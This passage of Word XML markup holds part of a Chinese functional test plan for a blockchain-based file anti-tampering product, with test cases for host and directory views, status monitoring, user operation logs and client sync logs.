      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="6664A9B1" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74121006"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73FDB063"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5E3F119D" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3ECEE283"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21D4950E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>查看主机列表</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73670F47"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lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A4EBBF9" wp14:editId="798E091C">
                  <wp:extent cx="4201795" cy="1234440"/>
                  <wp:effectExtent l="0" t="0" r="14605" b="1016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3"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4201795" cy="1234440"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="53C204C9"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点击节点，查看文件目录</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="553E85BC"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59006637" wp14:editId="7F5E2D4F">
                  <wp:extent cx="4201795" cy="2221230"/>
                  <wp:effectExtent l="0" t="0" r="14605" b="1397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4"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4201795" cy="2221230"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A9D5AA8"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查看历史版本</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61ABC54E"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5AFD2E07" wp14:editId="3DDBA5F9">
                  <wp:extent cx="4201795" cy="2301240"/>
                  <wp:effectExtent l="0" t="0" r="14605" b="10160"/>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5"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4201795" cy="2301240"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="15BD3F38"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停用、启用目录</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="182F00D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2E7B1CB9" wp14:editId="4409A1D3">
                  <wp:extent cx="4201795" cy="1663065"/>
                  <wp:effectExtent l="0" t="0" r="14605" b="13335"/>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6"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4201795" cy="1663065"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="4B1CDFAA" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34939D03" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6833" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1DFB41ED" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>查看历史版本，停用、启用目录成功。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="5517987B" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DBD49EF"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51CA331C" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="05418253" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="342" w:name="_Toc36487953"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>状态监控模块</w:t>
      </w:r>
      <w:bookmarkEnd w:id="342"/>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2276F316" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D316340"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2AB95176" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>状态监控模块</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="7F357909" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="485856F4"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000C9ED1" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>界面测试、接口数据测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="4257B9B8" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4171488E"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31F941A2" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>区块链防篡改功能相关组件全部开启</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="5E9BCCA5" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A7CA7D4"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5B3F3DA4" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rStyle w:val="8lab-Char0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rStyle w:val="8lab-Char0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>查看目标</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rStyle w:val="8lab-Char0"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>主机上的服务状态，运行状态包括正常和心跳超时等。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="242C9D50" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="4091F378" wp14:editId="3A3617F0">
                  <wp:extent cx="4197350" cy="1362710"/>
                  <wp:effectExtent l="0" t="0" r="19050" b="8890"/>
                  <wp:docPr id="5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77"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4197350" cy="1362710"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="05ED8F01" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A06B3D4"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0E2D9659" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>界面显示正常，接口数据正常。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="6625AE1B" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0593D576"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1370B6E8" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4E953B1E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="343" w:name="_Toc36487954"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户操作日志</w:t>
      </w:r>
      <w:bookmarkEnd w:id="343"/>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57B60B01" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E09CAA9"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68B08A49" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>用户操作日志</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="1222DC7B" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DD10232"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564E3A63" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>界面测试、接口数据测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="532D7CCF" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E711F77"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34D10EB1"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5D3A0701" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1319E93E"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6415B368" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>代码仓库服务的</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>操作日志查看功能。主要包含用户的启动/暂停根目录保护，新增、删除、移动和重命名等操作记录。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F908C5A" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-c"/>
              <w:spacing w:before="312" w:after="312"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="57651DEE"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lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="484127C1" wp14:editId="069F0197">
                  <wp:extent cx="4194810" cy="1682115"/>
                  <wp:effectExtent l="0" t="0" r="21590" b="19685"/>
                  <wp:docPr id="5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78"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4194810" cy="1682115"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="00205513" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="162B9F83"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22931884"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Style w:val="8lab-Char0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>界面显示正常，接口数据正常</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="537EE62D" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="736C7A90"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23A6DD27" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4651315A" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="344" w:name="_Toc36487955"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>客户端</w:t>
      </w:r>
      <w:r w:rsidRPr="00536672">
        <w:t>同步</w:t>
      </w:r>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>日志</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34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409328C0" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33DF1DD7"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11889A46" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>客户端防</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>同步</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>日志</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="32CA99F3" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="688F25DD"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56AC8080" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>界面测试、接口数据测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="09687CF4" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2180C4E3"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640E087D" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>区块链防篡改功能相关组件全部开启</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="0683F27A" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="088E5271"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56FD7C8F" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>查看</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>目标主机上被保护目录的篡改操作。监控的篡改包括新增、删除、修改和移动目录或文件的4类篡改操作。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55A06D0A" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="11EA7FF7" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0EF9DDA2"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22B842E1" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>界面显示正常，接口数据正常。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="68950636" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C3BF27B"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52D24B06" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="381C2813" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="345" w:name="_Toc36487956"/>
      <w:r w:rsidRPr="00536672">
        <w:t>用户管理</w:t>
      </w:r>
      <w:bookmarkEnd w:id="345"/>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4C044834" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
